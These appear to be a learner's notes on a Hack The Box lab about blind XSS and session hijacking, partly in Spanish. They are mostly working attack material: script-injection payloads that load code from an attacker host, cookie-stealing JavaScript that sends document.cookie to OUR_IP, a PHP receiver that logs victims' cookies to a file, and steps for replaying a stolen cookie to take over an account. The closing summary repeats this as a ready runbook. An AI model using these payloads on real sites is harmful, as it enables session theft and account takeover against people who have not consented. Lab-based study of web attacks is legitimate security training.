Blind XSS - Session Hijacking

Blind XSS Detection

Let's run the test on the web application on (/hijacking) in the server at the end of this section. We see a User Registration page with multiple fields, so let's try to submit a test user to see how the form handles the data:

As we can see, once we submit the form we get the following message:

Session Hijacking

A session hijacking attack is very similar to the phishing attack we performed in the previous section. It requires a JavaScript payload to send us the required data and a PHP script hosted on our server to grab and parse the transmitted data.

There are multiple JavaScript payloads we can use to grab the session cookie and send it to us, as shown by PayloadsAllTheThings:

document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

We can write any of these JavaScript payloads to script.js, which will be hosted on our VM as well:

new Image().src='http://OUR_IP/index.php?c='+document.cookie

Now, we can change the URL in the XSS payload we found earlier to use script.js (don't forget to replace OUR_IP with your VM IP in the JS script and the XSS payload):

<script src=http://OUR_IP/script.js></script>

Now, we wait for the victim to visit the vulnerable page and view our XSS payload. Once they do, we will get two requests on our server, one for script.js, which in turn will make another request with the cookie value:

10.10.10.10:52798 [200]: /script.js
10.10.10.10:52799 [200]: /index.php?c=cookie=f904f93c949d19d870911bf8b05fe7b2

We can save the following PHP script as index.php, and re-run the PHP server again:

Code: php

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

As mentioned earlier, we get the cookie value right in the terminal, as we can see. However, since we prepared a PHP script, we also get the cookies.txt file with a clean log of cookies:

eldeim@htb[/htb]$ cat cookies.txt 
Victim IP: 10.10.10.1 | Cookie: cookie=f904f93c949d19d870911bf8b05fe7b2

Finally, we can use this cookie on the login.php page to access the victim's account. To do so, once we navigate to /hijacking/login.php, we can click Shift+F9 in Firefox to reveal the Storage bar in the Developer Tools. Then, we can click on the + button on the top right corner and add our cookie, where the Name is the part before = and the Value is the part after = from our stolen cookie:

Resume

Test to be Performed

We set up a server and try XSS in inputs

mkdir /tmp/tmpserver
cd /tmp/tmpserver
sudo php -S 0.0.0.0:8000

<script src="http://TU_IP:8000/username"></script>  ← lo pones en el campo 'username'
<script src="http://TU_IP:8000/fullname"></script>  ← lo pones en el campo 'fullname'
## Test anothers payloadsallthethings -->
<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>

Maybe there is a content field to enter url and redirect to our web server

Malicious Payload

document.location='http://OUR_IP/index.php?c='+document.cookie;
## or
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

Create this payload with name example script.js in /tmp/tmpserver

Build the receptor

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

It save with name index.php

Send the XSS injection and Wait

<script src="http://TU_IP:8000/script.js"></script>
## or anothers exploits detected of payloadsallthethings idk